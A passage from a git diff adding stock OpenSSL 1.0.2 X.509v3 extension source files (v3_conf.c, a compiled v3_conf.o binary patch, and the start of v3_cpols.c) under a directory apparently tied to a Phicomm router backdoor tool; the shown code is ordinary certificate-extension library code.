+                                    int crit, char *value);
+static X509_EXTENSION *v3_generic_extension(const char *ext, char *value,
+                                            int crit, int type,
+                                            X509V3_CTX *ctx);
+static char *conf_lhash_get_string(void *db, char *section, char *value);
+static STACK_OF(CONF_VALUE) *conf_lhash_get_section(void *db, char *section);
+static X509_EXTENSION *do_ext_i2d(const X509V3_EXT_METHOD *method,
+                                  int ext_nid, int crit, void *ext_struc);
+static unsigned char *generic_asn1(char *value, X509V3_CTX *ctx,
+                                   long *ext_len);
+/* CONF *conf:  Config file    */
+/* char *name:  Name    */
+/* char *value:  Value    */
+X509_EXTENSION *X509V3_EXT_nconf(CONF *conf, X509V3_CTX *ctx, char *name,
+                                 char *value)
+{
+    int crit;
+    int ext_type;
+    X509_EXTENSION *ret;
+    crit = v3_check_critical(&value);
+    if ((ext_type = v3_check_generic(&value)))
+        return v3_generic_extension(name, value, crit, ext_type, ctx);
+    ret = do_ext_nconf(conf, ctx, OBJ_sn2nid(name), crit, value);
+    if (!ret) {
+        X509V3err(X509V3_F_X509V3_EXT_NCONF, X509V3_R_ERROR_IN_EXTENSION);
+        ERR_add_error_data(4, "name=", name, ", value=", value);
+    }
+    return ret;
+}
+
+/* CONF *conf:  Config file    */
+/* char *value:  Value    */
+X509_EXTENSION *X509V3_EXT_nconf_nid(CONF *conf, X509V3_CTX *ctx, int ext_nid,
+                                     char *value)
+{
+    int crit;
+    int ext_type;
+    crit = v3_check_critical(&value);
+    if ((ext_type = v3_check_generic(&value)))
+        return v3_generic_extension(OBJ_nid2sn(ext_nid),
+                                    value, crit, ext_type, ctx);
+    return do_ext_nconf(conf, ctx, ext_nid, crit, value);
+}
+
+/* CONF *conf:  Config file    */
+/* char *value:  Value    */
+static X509_EXTENSION *do_ext_nconf(CONF *conf, X509V3_CTX *ctx, int ext_nid,
+                                    int crit, char *value)
+{
+    const X509V3_EXT_METHOD *method;
+    X509_EXTENSION *ext;
+    STACK_OF(CONF_VALUE) *nval;
+    void *ext_struc;
+    if (ext_nid == NID_undef) {
+        X509V3err(X509V3_F_DO_EXT_NCONF, X509V3_R_UNKNOWN_EXTENSION_NAME);
+        return NULL;
+    }
+    if (!(method = X509V3_EXT_get_nid(ext_nid))) {
+        X509V3err(X509V3_F_DO_EXT_NCONF, X509V3_R_UNKNOWN_EXTENSION);
+        return NULL;
+    }
+    /* Now get internal extension representation based on type */
+    if (method->v2i) {
+        if (*value == '@')
+            nval = NCONF_get_section(conf, value + 1);
+        else
+            nval = X509V3_parse_list(value);
+        if (sk_CONF_VALUE_num(nval) <= 0) {
+            X509V3err(X509V3_F_DO_EXT_NCONF,
+                      X509V3_R_INVALID_EXTENSION_STRING);
+            ERR_add_error_data(4, "name=", OBJ_nid2sn(ext_nid), ",section=",
+                               value);
+            return NULL;
+        }
+        ext_struc = method->v2i(method, ctx, nval);
+        if (*value != '@')
+            sk_CONF_VALUE_pop_free(nval, X509V3_conf_free);
+        if (!ext_struc)
+            return NULL;
+    } else if (method->s2i) {
+        if (!(ext_struc = method->s2i(method, ctx, value)))
+            return NULL;
+    } else if (method->r2i) {
+        if (!ctx->db || !ctx->db_meth) {
+            X509V3err(X509V3_F_DO_EXT_NCONF, X509V3_R_NO_CONFIG_DATABASE);
+            return NULL;
+        }
+        if (!(ext_struc = method->r2i(method, ctx, value)))
+            return NULL;
+    } else {
+        X509V3err(X509V3_F_DO_EXT_NCONF,
+                  X509V3_R_EXTENSION_SETTING_NOT_SUPPORTED);
+        ERR_add_error_data(2, "name=", OBJ_nid2sn(ext_nid));
+        return NULL;
+    }
+
+    ext = do_ext_i2d(method, ext_nid, crit, ext_struc);
+    if (method->it)
+        ASN1_item_free(ext_struc, ASN1_ITEM_ptr(method->it));
+    else
+        method->ext_free(ext_struc);
+    return ext;
+
+}
+
+static X509_EXTENSION *do_ext_i2d(const X509V3_EXT_METHOD *method,
+                                  int ext_nid, int crit, void *ext_struc)
+{
+    unsigned char *ext_der;
+    int ext_len;
+    ASN1_OCTET_STRING *ext_oct;
+    X509_EXTENSION *ext;
+    /* Convert internal representation to DER */
+    if (method->it) {
+        ext_der = NULL;
+        ext_len =
+            ASN1_item_i2d(ext_struc, &ext_der, ASN1_ITEM_ptr(method->it));
+        if (ext_len < 0)
+            goto merr;
+    } else {
+        unsigned char *p;
+        ext_len = method->i2d(ext_struc, NULL);
+        if (!(ext_der = OPENSSL_malloc(ext_len)))
+            goto merr;
+        p = ext_der;
+        method->i2d(ext_struc, &p);
+    }
+    if (!(ext_oct = M_ASN1_OCTET_STRING_new()))
+        goto merr;
+    ext_oct->data = ext_der;
+    ext_oct->length = ext_len;
+
+    ext = X509_EXTENSION_create_by_NID(NULL, ext_nid, crit, ext_oct);
+    if (!ext)
+        goto merr;
+    M_ASN1_OCTET_STRING_free(ext_oct);
+
+    return ext;
+
+ merr:
+    X509V3err(X509V3_F_DO_EXT_I2D, ERR_R_MALLOC_FAILURE);
+    return NULL;
+
+}
+
+/* Given an internal structure, nid and critical flag create an extension */
+
+X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc)
+{
+    const X509V3_EXT_METHOD *method;
+    if (!(method = X509V3_EXT_get_nid(ext_nid))) {
+        X509V3err(X509V3_F_X509V3_EXT_I2D, X509V3_R_UNKNOWN_EXTENSION);
+        return NULL;
+    }
+    return do_ext_i2d(method, ext_nid, crit, ext_struc);
+}
+
+/* Check the extension string for critical flag */
+static int v3_check_critical(char **value)
+{
+    char *p = *value;
+    if ((strlen(p) < 9) || strncmp(p, "critical,", 9))
+        return 0;
+    p += 9;
+    while (isspace((unsigned char)*p))
+        p++;
+    *value = p;
+    return 1;
+}
+
+/* Check extension string for generic extension and return the type */
+static int v3_check_generic(char **value)
+{
+    int gen_type = 0;
+    char *p = *value;
+    if ((strlen(p) >= 4) && !strncmp(p, "DER:", 4)) {
+        p += 4;
+        gen_type = 1;
+    } else if ((strlen(p) >= 5) && !strncmp(p, "ASN1:", 5)) {
+        p += 5;
+        gen_type = 2;
+    } else
+        return 0;
+
+    while (isspace((unsigned char)*p))
+        p++;
+    *value = p;
+    return gen_type;
+}
+
+/* Create a generic extension: for now just handle DER type */
+static X509_EXTENSION *v3_generic_extension(const char *ext, char *value,
+                                            int crit, int gen_type,
+                                            X509V3_CTX *ctx)
+{
+    unsigned char *ext_der = NULL;
+    long ext_len;
+    ASN1_OBJECT *obj = NULL;
+    ASN1_OCTET_STRING *oct = NULL;
+    X509_EXTENSION *extension = NULL;
+    if (!(obj = OBJ_txt2obj(ext, 0))) {
+        X509V3err(X509V3_F_V3_GENERIC_EXTENSION,
+                  X509V3_R_EXTENSION_NAME_ERROR);
+        ERR_add_error_data(2, "name=", ext);
+        goto err;
+    }
+
+    if (gen_type == 1)
+        ext_der = string_to_hex(value, &ext_len);
+    else if (gen_type == 2)
+        ext_der = generic_asn1(value, ctx, &ext_len);
+
+    if (ext_der == NULL) {
+        X509V3err(X509V3_F_V3_GENERIC_EXTENSION,
+                  X509V3_R_EXTENSION_VALUE_ERROR);
+        ERR_add_error_data(2, "value=", value);
+        goto err;
+    }
+
+    if (!(oct = M_ASN1_OCTET_STRING_new())) {
+        X509V3err(X509V3_F_V3_GENERIC_EXTENSION, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    oct->data = ext_der;
+    oct->length = ext_len;
+    ext_der = NULL;
+
+    extension = X509_EXTENSION_create_by_OBJ(NULL, obj, crit, oct);
+
+ err:
+    ASN1_OBJECT_free(obj);
+    M_ASN1_OCTET_STRING_free(oct);
+    if (ext_der)
+        OPENSSL_free(ext_der);
+    return extension;
+
+}
+
+static unsigned char *generic_asn1(char *value, X509V3_CTX *ctx,
+                                   long *ext_len)
+{
+    ASN1_TYPE *typ;
+    unsigned char *ext_der = NULL;
+    typ = ASN1_generate_v3(value, ctx);
+    if (typ == NULL)
+        return NULL;
+    *ext_len = i2d_ASN1_TYPE(typ, &ext_der);
+    ASN1_TYPE_free(typ);
+    return ext_der;
+}
+
+/*
+ * This is the main function: add a bunch of extensions based on a config
+ * file section to an extension STACK.
+ */
+
+int X509V3_EXT_add_nconf_sk(CONF *conf, X509V3_CTX *ctx, char *section,
+                            STACK_OF(X509_EXTENSION) **sk)
+{
+    X509_EXTENSION *ext;
+    STACK_OF(CONF_VALUE) *nval;
+    CONF_VALUE *val;
+    int i;
+    if (!(nval = NCONF_get_section(conf, section)))
+        return 0;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        val = sk_CONF_VALUE_value(nval, i);
+        if (!(ext = X509V3_EXT_nconf(conf, ctx, val->name, val->value)))
+            return 0;
+        if (sk)
+            X509v3_add_ext(sk, ext, -1);
+        X509_EXTENSION_free(ext);
+    }
+    return 1;
+}
+
+/*
+ * Convenience functions to add extensions to a certificate, CRL and request
+ */
+
+int X509V3_EXT_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                         X509 *cert)
+{
+    STACK_OF(X509_EXTENSION) **sk = NULL;
+    if (cert)
+        sk = &cert->cert_info->extensions;
+    return X509V3_EXT_add_nconf_sk(conf, ctx, section, sk);
+}
+
+/* Same as above but for a CRL */
+
+int X509V3_EXT_CRL_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                             X509_CRL *crl)
+{
+    STACK_OF(X509_EXTENSION) **sk = NULL;
+    if (crl)
+        sk = &crl->crl->extensions;
+    return X509V3_EXT_add_nconf_sk(conf, ctx, section, sk);
+}
+
+/* Add extensions to certificate request */
+
+int X509V3_EXT_REQ_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                             X509_REQ *req)
+{
+    STACK_OF(X509_EXTENSION) *extlist = NULL, **sk = NULL;
+    int i;
+    if (req)
+        sk = &extlist;
+    i = X509V3_EXT_add_nconf_sk(conf, ctx, section, sk);
+    if (!i || !sk)
+        return i;
+    i = X509_REQ_add_extensions(req, extlist);
+    sk_X509_EXTENSION_pop_free(extlist, X509_EXTENSION_free);
+    return i;
+}
+
+/* Config database functions */
+
+char *X509V3_get_string(X509V3_CTX *ctx, char *name, char *section)
+{
+    if (!ctx->db || !ctx->db_meth || !ctx->db_meth->get_string) {
+        X509V3err(X509V3_F_X509V3_GET_STRING, X509V3_R_OPERATION_NOT_DEFINED);
+        return NULL;
+    }
+    if (ctx->db_meth->get_string)
+        return ctx->db_meth->get_string(ctx->db, name, section);
+    return NULL;
+}
+
+STACK_OF(CONF_VALUE) *X509V3_get_section(X509V3_CTX *ctx, char *section)
+{
+    if (!ctx->db || !ctx->db_meth || !ctx->db_meth->get_section) {
+        X509V3err(X509V3_F_X509V3_GET_SECTION,
+                  X509V3_R_OPERATION_NOT_DEFINED);
+        return NULL;
+    }
+    if (ctx->db_meth->get_section)
+        return ctx->db_meth->get_section(ctx->db, section);
+    return NULL;
+}
+
+void X509V3_string_free(X509V3_CTX *ctx, char *str)
+{
+    if (!str)
+        return;
+    if (ctx->db_meth->free_string)
+        ctx->db_meth->free_string(ctx->db, str);
+}
+
+void X509V3_section_free(X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *section)
+{
+    if (!section)
+        return;
+    if (ctx->db_meth->free_section)
+        ctx->db_meth->free_section(ctx->db, section);
+}
+
+static char *nconf_get_string(void *db, char *section, char *value)
+{
+    return NCONF_get_string(db, section, value);
+}
+
+static STACK_OF(CONF_VALUE) *nconf_get_section(void *db, char *section)
+{
+    return NCONF_get_section(db, section);
+}
+
+static X509V3_CONF_METHOD nconf_method = {
+    nconf_get_string,
+    nconf_get_section,
+    NULL,
+    NULL
+};
+
+void X509V3_set_nconf(X509V3_CTX *ctx, CONF *conf)
+{
+    ctx->db_meth = &nconf_method;
+    ctx->db = conf;
+}
+
+void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subj, X509_REQ *req,
+                    X509_CRL *crl, int flags)
+{
+    ctx->issuer_cert = issuer;
+    ctx->subject_cert = subj;
+    ctx->crl = crl;
+    ctx->subject_req = req;
+    ctx->flags = flags;
+}
+
+/* Old conf compatibility functions */
+
+X509_EXTENSION *X509V3_EXT_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                                char *name, char *value)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return X509V3_EXT_nconf(&ctmp, ctx, name, value);
+}
+
+/* LHASH *conf:  Config file    */
+/* char *value:  Value    */
+X509_EXTENSION *X509V3_EXT_conf_nid(LHASH_OF(CONF_VALUE) *conf,
+                                    X509V3_CTX *ctx, int ext_nid, char *value)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return X509V3_EXT_nconf_nid(&ctmp, ctx, ext_nid, value);
+}
+
+static char *conf_lhash_get_string(void *db, char *section, char *value)
+{
+    return CONF_get_string(db, section, value);
+}
+
+static STACK_OF(CONF_VALUE) *conf_lhash_get_section(void *db, char *section)
+{
+    return CONF_get_section(db, section);
+}
+
+static X509V3_CONF_METHOD conf_lhash_method = {
+    conf_lhash_get_string,
+    conf_lhash_get_section,
+    NULL,
+    NULL
+};
+
+void X509V3_set_conf_lhash(X509V3_CTX *ctx, LHASH_OF(CONF_VALUE) *lhash)
+{
+    ctx->db_meth = &conf_lhash_method;
+    ctx->db = lhash;
+}
+
+int X509V3_EXT_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                        char *section, X509 *cert)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return X509V3_EXT_add_nconf(&ctmp, ctx, section, cert);
+}
+
+/* Same as above but for a CRL */
+
+int X509V3_EXT_CRL_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                            char *section, X509_CRL *crl)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return X509V3_EXT_CRL_add_nconf(&ctmp, ctx, section, crl);
+}
+
+/* Add extensions to certificate request */
+
+int X509V3_EXT_REQ_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                            char *section, X509_REQ *req)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return X509V3_EXT_REQ_add_nconf(&ctmp, ctx, section, req);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_conf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_conf.o
new file mode 100644
index 0000000000000000000000000000000000000000..0d72dbce61c25664c489c02c761262f83a3e5531
GIT binary patch
literal 11560
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_cpols.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_cpols.c
new file mode 100644
index 0000000..476d51c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_cpols.c
@@ -0,0 +1,479 @@
+/* v3_cpols.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+/* Certificate policies extension support: this one is a bit complex... */
+
+static int i2r_certpol(X509V3_EXT_METHOD *method, STACK_OF(POLICYINFO) *pol,
+                       BIO *out, int indent);
+static STACK_OF(POLICYINFO) *r2i_certpol(X509V3_EXT_METHOD *method,
+                                         X509V3_CTX *ctx, char *value);
+static void print_qualifiers(BIO *out, STACK_OF(POLICYQUALINFO) *quals,
+                             int indent);
+static void print_notice(BIO *out, USERNOTICE *notice, int indent);
+static POLICYINFO *policy_section(X509V3_CTX *ctx,
+                                  STACK_OF(CONF_VALUE) *polstrs, int ia5org);
+static POLICYQUALINFO *notice_section(X509V3_CTX *ctx,
+                                      STACK_OF(CONF_VALUE) *unot, int ia5org);
+static int nref_nos(STACK_OF(ASN1_INTEGER) *nnums, STACK_OF(CONF_VALUE) *nos);
+
+const X509V3_EXT_METHOD v3_cpols = {
+    NID_certificate_policies, 0, ASN1_ITEM_ref(CERTIFICATEPOLICIES),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    (X509V3_EXT_I2R)i2r_certpol,
+    (X509V3_EXT_R2I)r2i_certpol,
+    NULL
+};
+
+ASN1_ITEM_TEMPLATE(CERTIFICATEPOLICIES) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, CERTIFICATEPOLICIES, POLICYINFO)
